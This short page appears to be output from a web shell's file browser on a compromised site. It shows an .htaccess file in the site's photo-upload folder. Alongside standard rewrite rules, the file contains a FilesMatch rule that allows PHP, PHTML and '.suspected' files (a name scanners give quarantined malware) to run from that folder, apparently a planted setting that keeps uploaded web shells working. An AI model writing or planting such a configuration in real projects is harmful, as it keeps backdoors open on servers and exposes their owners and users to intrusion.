Current Path : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalFiles/Photos/ |
Current File : D:/InetPub/vhosts/kuccs.com.kw/httpdocs/PortalFiles/Photos/.htaccess |
<IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$"> Order Allow,Deny Allow from all </FilesMatch>